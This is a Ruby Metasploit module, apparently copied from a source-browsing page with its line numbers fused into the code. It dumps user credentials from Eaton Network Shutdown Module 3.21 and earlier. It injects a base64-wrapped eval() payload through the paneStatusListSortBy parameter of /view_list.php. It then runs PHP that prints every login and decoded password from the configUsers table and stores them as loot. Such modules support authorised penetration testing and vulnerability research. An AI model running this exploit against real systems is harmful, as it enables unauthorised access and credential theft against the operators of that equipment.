Path: blob/master/modules/auxiliary/gather/eaton_nsm_creds.rb
21532 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Auxiliary::Report7include Msf::Exploit::Remote::HttpClient89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Network Shutdown Module sort_values Credential Dumper',14'Description' => %q{15This module will extract user credentials from Network Shutdown Module16versions 3.21 and earlier by exploiting a vulnerability found in17lib/dbtools.inc, which uses unsanitized user input inside a eval() call.18Please note that in order to extract credentials, the vulnerable service19must have at least one USV module (an entry in the "nodes" table in20mgedb.db).21},22'References' => [23['OSVDB', '83199'],24['URL', 'https://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']25],26'Author' => [27'h0ng10',28'sinn3r'29],30'License' => MSF_LICENSE,31'DisclosureDate' => '2012-06-26',32'Notes' => {33'Reliability' => UNKNOWN_RELIABILITY,34'Stability' => UNKNOWN_STABILITY,35'SideEffects' => UNKNOWN_SIDE_EFFECTS36}37)38)3940register_options(41[42Opt::RPORT(4679)43]44)45end4647def execute_php_code(code, opts = {})48param_name = Rex::Text.rand_text_alpha(6)49padding = Rex::Text.rand_text_alpha(6)50php_code = Rex::Text.encode_base64(code)51url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"5253res = send_request_cgi(54{55'uri' => '/view_list.php',56'method' => 'POST',57'vars_get' =>58{59'paneStatusListSortBy' => url_param,60},61'vars_post' =>62{63param_name => php_code,64},65'headers' =>66{67'Connection' => 'Close'68}69}70)71res72end7374def read_credentials75pattern = Rex::Text.rand_text_numeric(10)76users_var = Rex::Text.rand_text_alpha(10)77user_var = Rex::Text.rand_text_alpha(10)78php = <<-EOT79$#{users_var} = &queryDB("SELECT * FROM configUsers;");80foreach($#{users_var} as $#{user_var}) {81print "#{pattern}" .$#{user_var}["login"]."#{pattern}".base64_decode($#{user_var}["pwd"])."#{pattern}";82} die();83EOT8485print_status("Reading user credentials from the database")86response = execute_php_code(php)8788if not response or response.code != 200 then89print_error("Failed: Error requesting page")90return91end9293credentials = response.body.to_s.scan(/\d{10}(.*)\d{10}(.*)\d{10}/)94return credentials95end9697def run98credentials = read_credentials99if credentials.empty?100print_warning("No credentials collected.")101print_warning("Sometimes this is because the server isn't in the vulnerable state.")102return103end104105cred_table = Rex::Text::Table.new(106'Header' => 'Network Shutdown Module Credentials',107'Indent' => 1,108'Columns' => ['Username', 'Password']109)110111credentials.each do |record|112cred_table << [record[0], record[1]]113end114115print_line116print_line(cred_table.to_s)117118loot_name = "eaton.nsm.credentials"119loot_type = "text/csv"120loot_filename = "eaton_nsm_creds.csv"121loot_desc = "Eaton Network Shutdown Module Credentials"122p = store_loot(loot_name, loot_type, datastore['RHOST'], cred_table.to_csv, loot_filename, loot_desc)123print_good("Credentials saved in: #{p.to_s}")124end125end126127128